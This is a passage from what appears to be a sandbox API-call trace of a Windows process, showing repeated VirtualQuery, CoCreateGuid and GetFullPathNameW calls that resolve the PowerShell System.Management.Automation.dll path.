lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.274] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.275] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.275] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.275] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.276] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.276] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.276] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.276] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.276] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.277] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.277] VirtualQuery (in: lpAddress=0x12b700, lpBuffer=0x12c5c0, dwLength=0x30 | out: lpBuffer=0x12c5c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.277] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.277] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.277] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.278] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.278] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x5ff302d9, Data2=0xa52e, Data3=0x4c7e, Data4=([0]=0xac, [1]=0x3f, [2]=0x4, [3]=0x74, [4]=0xe5, [5]=0x7d, [6]=0x4c, [7]=0x15))) returned 0x0 [0068.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12bd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.281] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.281] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.281] VirtualQuery (in: lpAddress=0x12bad0, lpBuffer=0x12c990, dwLength=0x30 | out: lpBuffer=0x12c990*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.282] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.282] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.283] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.283] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.283] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.283] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.283] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.284] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.284] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.284] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.284] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.284] VirtualQuery (in: lpAddress=0x12b700, lpBuffer=0x12c5c0, dwLength=0x30 | out: lpBuffer=0x12c5c0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.285] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.285] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.285] VirtualQuery (in: lpAddress=0x12ba30, lpBuffer=0x12c8f0, dwLength=0x30 | out: lpBuffer=0x12c8f0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.285] VirtualQuery (in: lpAddress=0x12bac0, lpBuffer=0x12c980, dwLength=0x30 | out: lpBuffer=0x12c980*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0068.285] CoCreateGuid (in: pguid=0x12d2b0 | out: pguid=0x12d2b0*(Data1=0x1c0a3e2b, Data2=0x495f, Data3=0x4825, Data4=([0]=0xbc, [1]=0xaa, [2]=0xd5, [3]=0x89, [4]=0x6b, [5]=0x35, [6]=0x5c, [7]=0xe9))) returned 0x0 [0068.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0068.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 